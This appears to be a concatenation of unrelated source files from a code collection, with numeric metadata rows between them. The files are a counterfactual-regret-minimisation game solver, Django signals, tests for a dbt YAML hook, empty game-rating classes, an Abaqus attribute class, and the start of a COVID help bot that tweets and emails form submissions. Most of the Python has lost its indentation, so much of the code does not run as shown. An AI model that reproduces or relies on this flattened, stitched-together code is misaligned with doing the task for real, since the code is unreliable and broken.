def traverse_tree(self, probs, player_id, s):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return (self.env.get_payoffs() / s, 1)
current_player = self.env.get_player_id()
        next_player = int(not (current_player))  # opponent index (assumes a two-player game)
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
if obs not in self.counter.keys():
self.counter[obs] = 0
# σ(I,.) = regret_matching(r_I)
self.policy[obs] = self.regret_matching(obs)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
if current_player == player_id:
sampling_dist = (
self.epsilon
* remove_illegal(np.ones(self.env.action_num), legal_actions)
/ self.env.action_num
) + (1 - self.epsilon) * (action_probs)
else:
sampling_dist = action_probs
sampled_action = np.random.choice(
range(self.env.action_num), p=remove_illegal(sampling_dist, legal_actions)
)
if current_player == player_id:
# action prob = σ(I,a)
action_prob = action_probs[sampled_action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
self.env.step(sampled_action)
(u, pi_tail) = self.traverse_tree(
new_probs, player_id, s * sampling_dist[sampled_action]
)
self.env.step_back()
for action in legal_actions:
W = u * probs[next_player]
if action == sampled_action:
# W ·(πσ(z[I]a,z)−πσ(z[I],z))
regret = W[current_player] * (pi_tail - probs[current_player])
else:
regret = -1 * W[current_player] * probs[current_player]
self.regrets[obs][action] += regret
else:
# action prob = σ(I,a)
action_prob = action_probs[sampled_action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
self.env.step(sampled_action)
(u, pi_tail) = self.traverse_tree(
new_probs, player_id, s * sampling_dist[sampled_action]
)
self.env.step_back()
for action in legal_actions:
# s_I[a] accumulates (t − c_I) · reach · σ(I, a); use each action's own probability
self.average_policy[obs][action] += (
(self.iteration - self.counter[obs]) * probs[next_player] * action_probs[action]
)
self.counter[obs] = self.iteration
return (u, pi_tail * action_prob)
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
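# Worked example (illustrative, not from the original source): with three
# actions and regrets r_I = [2.0, -1.0, 0.0], the positive regret sum is 2.0,
# so regret matching returns [1.0, 0.0, 0.0]; with r_I = [0.0, -1.0, -2.0]
# no regret is positive, so the uniform policy [1/3, 1/3, 1/3] is returned.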
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
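# Hypothetical usage sketch (not part of the original module). Assumes an
# RLCard-style environment created with allow_step_back, since traverse_tree
# relies on env.step_back(); the game name is a placeholder:
#
#   import rlcard
#   env = rlcard.make('leduc-holdem', config={'allow_step_back': True})
#   agent = OutcomeSampling_CFR(env)
#   for _ in range(10000):
#       agent.train()
#   agent.save()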
| 33.933174 | 97 | 0.558728 | 3,735 | 28,436 | 4.11004 | 0.059705 | 0.009902 | 0.030487 | 0.028141 | 0.866133 | 0.839685 | 0.823204 | 0.803791 | 0.793434 | 0.780601 | 0 | 0.004351 | 0.329195 | 28,436 | 837 | 98 | 33.973716 | 0.796121 | 0.284956 | 0 | 0.801034 | 0 | 0 | 0.028856 | 0.004398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077519 | false | 0 | 0.01292 | 0 | 0.157623 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d0713f579099a56b99b1feb60add50d18e5acb1 | 137 | py | Python | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | wagtailcommerce/orders/signals.py | theplusagency/wagtail-commerce | 6047170f29199ccaf2778534976ab0970c2877e7 | [
"BSD-3-Clause"
] | null | null | null | from django.dispatch import Signal
order_paid = Signal(providing_args=['order'])
shipment_generated = Signal(providing_args=['order'])
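# Hypothetical receiver sketch (not part of this module), showing how a
# consumer of these signals might connect with Django's standard machinery:
#
#   from django.dispatch import receiver
#   from wagtailcommerce.orders.signals import order_paid
#
#   @receiver(order_paid)
#   def handle_order_paid(sender, order, **kwargs):
#       ...  # e.g. start fulfilment or send a confirmation email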
| 22.833333 | 53 | 0.788321 | 17 | 137 | 6.117647 | 0.647059 | 0.288462 | 0.365385 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 137 | 5 | 54 | 27.4 | 0.832 | 0 | 0 | 0 | 1 | 0 | 0.072993 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
7d3191ab8e52cc85f784dcc216c93aa1a5713e77 | 6,524 | py | Python | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 153 | 2021-02-01T14:59:19.000Z | 2022-03-25T06:29:39.000Z | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 48 | 2021-02-01T13:46:40.000Z | 2022-03-30T22:41:15.000Z | tests/unit/test_unify_column_description.py | jtalmi/pre-commit-dbt | 3e143f5d866f4f90425808c8c0be0b49024cb044 | [
"MIT"
] | 27 | 2021-02-05T21:07:56.000Z | 2022-03-01T15:18:25.000Z | import pytest
from pre_commit_dbt.unify_column_description import main
TESTS = ( # type: ignore
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
0,
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test2
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test1
- name: test2
description: test
""",
["--ignore", "test1"],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
- name: test2
""",
1,
"""version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
(
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
0,
"""
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
""",
[],
),
)
@pytest.mark.parametrize(
("schema_yml", "expected_status_code", "expected_result", "ignore"), TESTS
)
def test_replace_column_description(
schema_yml, expected_status_code, expected_result, ignore, tmpdir
):
yml_file = tmpdir.join("schema.yml")
yml_file.write(schema_yml)
input_args = [str(yml_file)]
input_args.extend(ignore)
status_code = main(input_args)
result = yml_file.read_text("utf-8")
assert status_code == expected_status_code
assert expected_result == result
def test_replace_column_description_split(tmpdir):
schema_yml1 = """
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
"""
schema_yml2 = """
version: 2
models:
- name: same_col_desc_2
columns:
- name: test1
description: test_bad
- name: test2
"""
schema_yml3 = """
version: 2
models:
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
"""
yml_file1 = tmpdir.join("schema1.yml")
yml_file2 = tmpdir.join("schema2.yml")
yml_file3 = tmpdir.join("schema3.yml")
yml_file1.write(schema_yml1)
yml_file2.write(schema_yml2)
yml_file3.write(schema_yml3)
input_args = [str(yml_file1), str(yml_file2), str(yml_file3)]
status_code = main(input_args)
assert status_code == 1
result1 = yml_file1.read_text("utf-8")
result2 = yml_file2.read_text("utf-8")
result3 = yml_file3.read_text("utf-8")
assert (
result1
== """
version: 2
models:
- name: same_col_desc_1
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
assert (
result2
== """version: 2
models:
- name: same_col_desc_2
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
assert (
result3
== """version: 2
models:
- name: same_col_desc_3
columns:
- name: test1
description: test
- name: test2
description: test
"""
)
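# To run these parametrized tests locally (assumes pytest and the
# pre_commit_dbt package are installed):
#
#   pytest tests/unit/test_unify_column_description.py -v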
| 18.69341 | 78 | 0.57802 | 727 | 6,524 | 4.957359 | 0.088033 | 0.237236 | 0.237236 | 0.149834 | 0.824917 | 0.784961 | 0.784961 | 0.784961 | 0.758879 | 0.758879 | 0 | 0.03914 | 0.322502 | 6,524 | 348 | 79 | 18.747126 | 0.776244 | 0.001839 | 0 | 0.555556 | 0 | 0 | 0.383818 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 1 | 0.015873 | false | 0 | 0.015873 | 0 | 0.031746 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
adb9d725e9cf9c398e2277200be1b0050664e55c | 6,545 | py | Python | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_singed/na_singed_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Singed_Top_Aatrox(Ratings):
pass
class NA_Singed_Top_Ahri(Ratings):
pass
class NA_Singed_Top_Akali(Ratings):
pass
class NA_Singed_Top_Alistar(Ratings):
pass
class NA_Singed_Top_Amumu(Ratings):
pass
class NA_Singed_Top_Anivia(Ratings):
pass
class NA_Singed_Top_Annie(Ratings):
pass
class NA_Singed_Top_Ashe(Ratings):
pass
class NA_Singed_Top_AurelionSol(Ratings):
pass
class NA_Singed_Top_Azir(Ratings):
pass
class NA_Singed_Top_Bard(Ratings):
pass
class NA_Singed_Top_Blitzcrank(Ratings):
pass
class NA_Singed_Top_Brand(Ratings):
pass
class NA_Singed_Top_Braum(Ratings):
pass
class NA_Singed_Top_Caitlyn(Ratings):
pass
class NA_Singed_Top_Camille(Ratings):
pass
class NA_Singed_Top_Cassiopeia(Ratings):
pass
class NA_Singed_Top_Chogath(Ratings):
pass
class NA_Singed_Top_Corki(Ratings):
pass
class NA_Singed_Top_Darius(Ratings):
pass
class NA_Singed_Top_Diana(Ratings):
pass
class NA_Singed_Top_Draven(Ratings):
pass
class NA_Singed_Top_DrMundo(Ratings):
pass
class NA_Singed_Top_Ekko(Ratings):
pass
class NA_Singed_Top_Elise(Ratings):
pass
class NA_Singed_Top_Evelynn(Ratings):
pass
class NA_Singed_Top_Ezreal(Ratings):
pass
class NA_Singed_Top_Fiddlesticks(Ratings):
pass
class NA_Singed_Top_Fiora(Ratings):
pass
class NA_Singed_Top_Fizz(Ratings):
pass
class NA_Singed_Top_Galio(Ratings):
pass
class NA_Singed_Top_Gangplank(Ratings):
pass
class NA_Singed_Top_Garen(Ratings):
pass
class NA_Singed_Top_Gnar(Ratings):
pass
class NA_Singed_Top_Gragas(Ratings):
pass
class NA_Singed_Top_Graves(Ratings):
pass
class NA_Singed_Top_Hecarim(Ratings):
pass
class NA_Singed_Top_Heimerdinger(Ratings):
pass
class NA_Singed_Top_Illaoi(Ratings):
pass
class NA_Singed_Top_Irelia(Ratings):
pass
class NA_Singed_Top_Ivern(Ratings):
pass
class NA_Singed_Top_Janna(Ratings):
pass
class NA_Singed_Top_JarvanIV(Ratings):
pass
class NA_Singed_Top_Jax(Ratings):
pass
class NA_Singed_Top_Jayce(Ratings):
pass
class NA_Singed_Top_Jhin(Ratings):
pass
class NA_Singed_Top_Jinx(Ratings):
pass
class NA_Singed_Top_Kalista(Ratings):
pass
class NA_Singed_Top_Karma(Ratings):
pass
class NA_Singed_Top_Karthus(Ratings):
pass
class NA_Singed_Top_Kassadin(Ratings):
pass
class NA_Singed_Top_Katarina(Ratings):
pass
class NA_Singed_Top_Kayle(Ratings):
pass
class NA_Singed_Top_Kayn(Ratings):
pass
class NA_Singed_Top_Kennen(Ratings):
pass
class NA_Singed_Top_Khazix(Ratings):
pass
class NA_Singed_Top_Kindred(Ratings):
pass
class NA_Singed_Top_Kled(Ratings):
pass
class NA_Singed_Top_KogMaw(Ratings):
pass
class NA_Singed_Top_Leblanc(Ratings):
pass
class NA_Singed_Top_LeeSin(Ratings):
pass
class NA_Singed_Top_Leona(Ratings):
pass
class NA_Singed_Top_Lissandra(Ratings):
pass
class NA_Singed_Top_Lucian(Ratings):
pass
class NA_Singed_Top_Lulu(Ratings):
pass
class NA_Singed_Top_Lux(Ratings):
pass
class NA_Singed_Top_Malphite(Ratings):
pass
class NA_Singed_Top_Malzahar(Ratings):
pass
class NA_Singed_Top_Maokai(Ratings):
pass
class NA_Singed_Top_MasterYi(Ratings):
pass
class NA_Singed_Top_MissFortune(Ratings):
pass
class NA_Singed_Top_MonkeyKing(Ratings):
pass
class NA_Singed_Top_Mordekaiser(Ratings):
pass
class NA_Singed_Top_Morgana(Ratings):
pass
class NA_Singed_Top_Nami(Ratings):
pass
class NA_Singed_Top_Nasus(Ratings):
pass
class NA_Singed_Top_Nautilus(Ratings):
pass
class NA_Singed_Top_Nidalee(Ratings):
pass
class NA_Singed_Top_Nocturne(Ratings):
pass
class NA_Singed_Top_Nunu(Ratings):
pass
class NA_Singed_Top_Olaf(Ratings):
pass
class NA_Singed_Top_Orianna(Ratings):
pass
class NA_Singed_Top_Ornn(Ratings):
pass
class NA_Singed_Top_Pantheon(Ratings):
pass
class NA_Singed_Top_Poppy(Ratings):
pass
class NA_Singed_Top_Quinn(Ratings):
pass
class NA_Singed_Top_Rakan(Ratings):
pass
class NA_Singed_Top_Rammus(Ratings):
pass
class NA_Singed_Top_RekSai(Ratings):
pass
class NA_Singed_Top_Renekton(Ratings):
pass
class NA_Singed_Top_Rengar(Ratings):
pass
class NA_Singed_Top_Riven(Ratings):
pass
class NA_Singed_Top_Rumble(Ratings):
pass
class NA_Singed_Top_Ryze(Ratings):
pass
class NA_Singed_Top_Sejuani(Ratings):
pass
class NA_Singed_Top_Shaco(Ratings):
pass
class NA_Singed_Top_Shen(Ratings):
pass
class NA_Singed_Top_Shyvana(Ratings):
pass
class NA_Singed_Top_Singed(Ratings):
pass
class NA_Singed_Top_Sion(Ratings):
pass
class NA_Singed_Top_Sivir(Ratings):
pass
class NA_Singed_Top_Skarner(Ratings):
pass
class NA_Singed_Top_Sona(Ratings):
pass
class NA_Singed_Top_Soraka(Ratings):
pass
class NA_Singed_Top_Swain(Ratings):
pass
class NA_Singed_Top_Syndra(Ratings):
pass
class NA_Singed_Top_TahmKench(Ratings):
pass
class NA_Singed_Top_Taliyah(Ratings):
pass
class NA_Singed_Top_Talon(Ratings):
pass
class NA_Singed_Top_Taric(Ratings):
pass
class NA_Singed_Top_Teemo(Ratings):
pass
class NA_Singed_Top_Thresh(Ratings):
pass
class NA_Singed_Top_Tristana(Ratings):
pass
class NA_Singed_Top_Trundle(Ratings):
pass
class NA_Singed_Top_Tryndamere(Ratings):
pass
class NA_Singed_Top_TwistedFate(Ratings):
pass
class NA_Singed_Top_Twitch(Ratings):
pass
class NA_Singed_Top_Udyr(Ratings):
pass
class NA_Singed_Top_Urgot(Ratings):
pass
class NA_Singed_Top_Varus(Ratings):
pass
class NA_Singed_Top_Vayne(Ratings):
pass
class NA_Singed_Top_Veigar(Ratings):
pass
class NA_Singed_Top_Velkoz(Ratings):
pass
class NA_Singed_Top_Vi(Ratings):
pass
class NA_Singed_Top_Viktor(Ratings):
pass
class NA_Singed_Top_Vladimir(Ratings):
pass
class NA_Singed_Top_Volibear(Ratings):
pass
class NA_Singed_Top_Warwick(Ratings):
pass
class NA_Singed_Top_Xayah(Ratings):
pass
class NA_Singed_Top_Xerath(Ratings):
pass
class NA_Singed_Top_XinZhao(Ratings):
pass
class NA_Singed_Top_Yasuo(Ratings):
pass
class NA_Singed_Top_Yorick(Ratings):
pass
class NA_Singed_Top_Zac(Ratings):
pass
class NA_Singed_Top_Zed(Ratings):
pass
class NA_Singed_Top_Ziggs(Ratings):
pass
class NA_Singed_Top_Zilean(Ratings):
pass
class NA_Singed_Top_Zyra(Ratings):
pass
| 15.695444 | 46 | 0.766692 | 972 | 6,545 | 4.736626 | 0.151235 | 0.209818 | 0.389661 | 0.479583 | 0.803432 | 0.803432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169748 | 6,545 | 416 | 47 | 15.733173 | 0.847258 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
ade13e4077ce081f89dc245feed396e98908231e | 2,473 | py | Python | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/PlotOptions/OdbDiagnosticAttempt.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
class OdbDiagnosticAttempt:
"""The OdbDiagnosticAttempt object.
Attributes
----------
autoStabilize: Boolean
A boolean specifying the state of auto-stabilization. This attribute is read-only.
isConverged: Boolean
A boolean specifying the state of convergence for the attempt. This attribute is
read-only.
isCutBack: Boolean
A boolean specifying the state of cutback. This attribute is read-only.
needsReordering: Boolean
A boolean specifying whether or not reordering is needed. This attribute is read-only.
numberOfCutbackDiagnostics: str
An int specifying the number of cutback diagnostics. This attribute is read-only.
numberOfIterations: str
An int specifying the number of iterations for the particular attempt. This attribute is
read-only.
numberOfSevereDiscontinuityIterations: str
An int specifying the number of iterations with severe discontinuities. This attribute is
read-only.
size: str
A float specifying the size of the increment of the particular attempt. This attribute
is read-only.
Notes
-----
This object can be accessed by:
.. code-block:: python
import visualization
session.odbData[name].diagnosticData.steps[i].increments[i].attempts[i]
"""
# A boolean specifying the state of auto-stabilization. This attribute is read-only.
autoStabilize: Boolean = OFF
# A boolean specifying the state of convergence for the attempt. This attribute is
# read-only.
isConverged: Boolean = OFF
# A boolean specifying the state of cutback. This attribute is read-only.
isCutBack: Boolean = OFF
# A boolean specifying whether or not reordering is needed. This attribute is read-only.
needsReordering: Boolean = OFF
# An int specifying the number of cutback diagnostics. This attribute is read-only.
numberOfCutbackDiagnostics: str = ''
# An int specifying the number of iterations for the particular attempt. This attribute is
# read-only.
numberOfIterations: str = ''
# An int specifying the number of iterations with severe discontinuities. This attribute is
# read-only.
numberOfSevereDiscontinuityIterations: str = ''
# A float specifying the size of the increment of the particular attempt. This attribute
# is read-only.
size: str = ''
| 36.367647 | 96 | 0.705621 | 297 | 2,473 | 5.875421 | 0.225589 | 0.119198 | 0.137536 | 0.174212 | 0.862464 | 0.860745 | 0.860745 | 0.747851 | 0.73639 | 0.73639 | 0 | 0 | 0.23979 | 2,473 | 67 | 97 | 36.910448 | 0.928191 | 0.777598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cb30b256507833aee13e3ebcd8480256b6562300 | 65 | py | Python | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | 3 | 2017-06-23T04:32:02.000Z | 2018-03-27T13:30:19.000Z | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | null | null | null | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | 3 | 2018-08-11T15:47:08.000Z | 2022-03-06T18:13:48.000Z | from nastranpy.utils.get_skin_bays import get_skin_bays_geometry
| 32.5 | 64 | 0.907692 | 11 | 65 | 4.909091 | 0.727273 | 0.259259 | 0.407407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.885246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1dc3550ab611599ce13f25471a23557658e5b0cf | 7,422 | py | Python | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | import gspread
from oauth2client.service_account import ServiceAccountCredentials
import tweepy
import time
import logging
import pywhatkit
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# starting logging procedure
logging.basicConfig(filename='main.log', filemode='a', format='%(asctime)s - %(message)s', level=logging.INFO)
logger = logging.getLogger()
# Google Sheets API authorization
SCOPE = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive',]
logger.info('Added SCOPE')
# your json file
creds = ServiceAccountCredentials.from_json_keyfile_name('CREDENTIAL.json', SCOPE)
client = gspread.authorize(creds)
logger.info('Google API Authorization Done')
# Twitter authorization
# add your keys
CONSUMER_KEY = 'CONSUMER API'
CONSUMER_SECRET = 'CONSUMER SECRET'
ACCESS_KEY = 'ACCESS KEY'
ACCESS_SECRET = 'ACCESS SECRET'
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
try:
api.verify_credentials()
logger.info('Twitter API Authorization Done')
except Exception as e:
logger.info('Error During Authentication: {}'.format(e))
# gmail authorization
# sender details
SENDER_ADDRESS = 'EMAIL ADDRESS'
SENDER_PASS = 'EMAIL PASSWORD'
def mailer(name, contact, requirement, location, email, link):
message_content = '''
Hello!
Thank You for filling the form. Here\'s what we have received from you:
\tName: {}
\tContact: {}
\tRequirement: {}
\tLocation: {}
\tEmail: {}
This is your Twitter link: {}. Please keep monitoring the replies to this tweet; you may find something useful.
Note: This is an auto-generated email, so please don't reply to it. We can't guarantee help, but we will try our best.
Thank You for using our service
Get Well Soon!
Team CovidBot
'''
# setup MIME
message = MIMEMultipart()
message['From'] = SENDER_ADDRESS
message['To'] = email
message['Subject'] = 'Link for your tweet.'
message.attach(MIMEText(message_content.format(name, contact, requirement, location, email, link), 'plain'))
# create smtp session
logger.info('SMTP Session Created')
session = smtplib.SMTP('smtp.gmail.com', 587)
session.starttls()
session.login(SENDER_ADDRESS, SENDER_PASS)
text = message.as_string()
session.sendmail(SENDER_ADDRESS, email, text)
logger.info('Mail Sent')
session.quit()
curtime = list(time.localtime())
# sending whatsapp message
